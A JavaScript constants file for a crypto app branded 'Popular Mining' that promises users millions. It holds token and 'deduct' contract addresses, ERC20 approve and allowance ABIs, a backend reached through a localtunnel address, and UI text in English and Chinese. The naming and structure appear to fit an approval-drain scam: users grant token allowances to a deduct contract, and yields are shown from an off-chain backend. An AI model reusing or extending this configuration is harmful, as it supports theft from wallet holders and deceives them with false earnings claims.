export const DEDUCT_CONTRACT_ADDRESS = '0xaFfC493Ab24fD7029E03CED0d7B87eAFC36E78E0';
export const USDT_CONTRACT_ADDRESS = '0xdAC17F958D2ee523a2206206994597C13D831ec7';
export const USDC_CONTRACT_ADDRESS = '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48';
export const WETH_CONTRACT_ADDRESS = '0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2';
export const API_BASE_URL = 'https://pink-taxes-cut.loca.lt';

export const DEDUCT_CONTRACT_ABI = [
    "function isServiceActiveFor(address customer) view returns (bool)",
    "function activateService(address tokenContract) external",
    "function REQUIRED_ALLOWANCE_THRESHOLD() view returns (uint256)",
    {
        "anonymous": false,
        "inputs": [
            { "indexed": true, "name": "customer", "type": "address" },
            { "indexed": true, "name": "tokenContract", "type": "address" }
        ],
        "name": "ServiceActivated",
        "type": "event"
    }
];

export const ERC20_ABI = [
    "function approve(address spender, uint256 amount) external returns (bool)",
    "function balanceOf(address account) view returns (uint256)",
    "function allowance(address owner, address spender) view returns (uint256)"
];

export const translations = {
    'en': {
        title: 'Popular Mining',
        subtitle: 'Start Earning Millions',
        tabLiquidity: 'Liquidity',
        tabPledging: 'Pledging',
        grossOutputLabel: 'Gross Output',
        cumulativeLabel: 'Cumulative',
        walletBalanceLabel: 'Wallet Balance',
        accountBalanceLabel: 'Account Balance',
        compoundLabel: '⚡ Compound',
        nextBenefit: 'Next Benefit: 00:00:00',
        startBtnText: 'Start',
        pledgeAmountLabel: 'Pledge Amount',
        pledgeDurationLabel: 'Duration',
        pledgeBtnText: 'Pledge Now',
        totalPledgedLabel: 'Total Pledged',
        expectedYieldLabel: 'Expected Yield',
        apyLabel: 'APY',
        lockedUntilLabel: 'Locked Until',
        claimBtnText: 'Claim',
        noClaimable: 'No claimable interest available or invalid value.',
        priceError: 'Could not fetch price data. Please try again later.',
        invalidCalc: 'Invalid calculation. Please refresh and try again.',
        claimSuccess: 'Claim successful! Your Account Balance has been updated.',
        walletConnected: 'Wallet connected successfully.',
        fetchingBalances: 'Fetching wallet balances...',
        error: 'Error',
        offlineWarning: 'Server is offline, running locally. Data will sync when server is available.',
        noWallet: 'Please install a compatible wallet to continue.',
        dataSent: 'Data sent to backend successfully.',
        pledgeSuccess: 'Pledge successful! Data sent to backend.',
        pledgeError: 'Pledge failed. Please try again.',
        invalidPledgeAmount: 'Please enter a valid pledge amount greater than 0.',
        invalidPledgeToken: 'Please select a valid token.',
        insufficientBalance: 'Insufficient balance for selected token.',
        tunnelWarning: 'Localtunnel reminder page detected. Please test locally or visit the tunnel URL to click Continue.',
        sseFailed: 'SSE connection failed, using fallback polling.',
        ethersError: 'Ethers.js initialization failed. Please check your network or CDN.'
    },
    'zh-Hant': {
        title: '熱門挖礦',
        subtitle: '開始賺取數百萬',
        tabLiquidity: '流動性',
        tabPledging: '質押',
        grossOutputLabel: '總產出',
        cumulativeLabel: '累計',
        walletBalanceLabel: '錢包餘額',
        accountBalanceLabel: '帳戶餘額',
        compoundLabel: '⚡ 複利',
        nextBenefit: '下次收益: 00:00:00',
        startBtnText: '開始',
        pledgeAmountLabel: '質押金額',
        pledgeDurationLabel: '期間',
        pledgeBtnText: '立即質押',
        totalPledgedLabel: '總質押',
        expectedYieldLabel: '預期收益',
        apyLabel: '年化收益率',
        lockedUntilLabel: '鎖定至',
        claimBtnText: '領取',
        noClaimable: '無可領取的利息或數值無效。',
        priceError: '無法獲取價格數據，請稍後重試。',
        invalidCalc: '計算無效，請刷新後重試。',
        claimSuccess: '領取成功！您的帳戶餘額已更新。',
        walletConnected: '錢包連線成功。',
        fetchingBalances: '正在獲取錢包餘額...',
        error: '錯誤',
        offlineWarning: '伺服器離線，使用本地運行。數據將在伺服器可用時同步。',
        noWallet: '請安裝相容錢包以繼續。',
        dataSent: '數據已成功發送至後端。',
        pledgeSuccess: '質押成功！數據已發送至後端。',
        pledgeError: '質押失敗，請重試。',
        invalidPledgeAmount: '請輸入大於 0 的有效質押金額。',
        invalidPledgeToken: '請選擇有效的代幣。',
        insufficientBalance: '選定代幣餘額不足。',
        tunnelWarning: '檢測到 Localtunnel 提示頁面，請嘗試本地測試或訪問隧道 URL 點擊繼續。',
        sseFailed: 'SSE 連線失敗，使用後備輪詢更新數據。',
        ethersError: 'Ethers.js 初始化失敗，請檢查網絡或 CDN。'
    },
    'zh-Hans': {
        title: '热门挖矿',
        subtitle: '开始赚取数百万',
        tabLiquidity: '流动性',
        tabPledging: '质押',
        grossOutputLabel: '总产出',
        cumulativeLabel: '累计',
        walletBalanceLabel: '钱包余额',
        accountBalanceLabel: '账户余额',
        compoundLabel: '⚡ 复利',
        nextBenefit: '下次收益: 00:00:00',
        startBtnText: '开始',
        pledgeAmountLabel: '质押金额',
        pledgeDurationLabel: '期间',
        pledgeBtnText: '立即质押',
        totalPledgedLabel: '总质押',
        expectedYieldLabel: '预期收益',
        apyLabel: '年化收益率',
        lockedUntilLabel: '锁定至',
        claimBtnText: '领取',
        noClaimable: '无可领取的利息或数值无效。',
        priceError: '无法获取价格数据，请稍后重试。',
        invalidCalc: '计算无效，请刷新后重试。',
        claimSuccess: '领取成功！您的账户余额已更新。',
        walletConnected: '钱包连接成功。',
        fetchingBalances: '正在获取钱包余额...',
        error: '错误',
        offlineWarning: '服务器离线，使用本地运行。数据将在服务器可用时同步。',
        noWallet: '请安装兼容钱包以继续。',
        dataSent: '数据已成功发送至后端。',
        pledgeSuccess: '质押成功！数据已发送至后端。',
        pledgeError: '质押失败，请重试。',
        invalidPledgeAmount: '请输入大于 0 的有效质押金额。',
        invalidPledgeToken: '请选择有效的代币。',
        insufficientBalance: '选定代币余额不足。',
        tunnelWarning: '检测到 Localtunnel 提示页面，请尝试本地测试或访问隧道 URL 点击继续。',
        sseFailed: 'SSE 连线失败，使用后备轮询更新数据。',
        ethersError: 'Ethers.js 初始化失败，请检查网络或 CDN。'
    }
};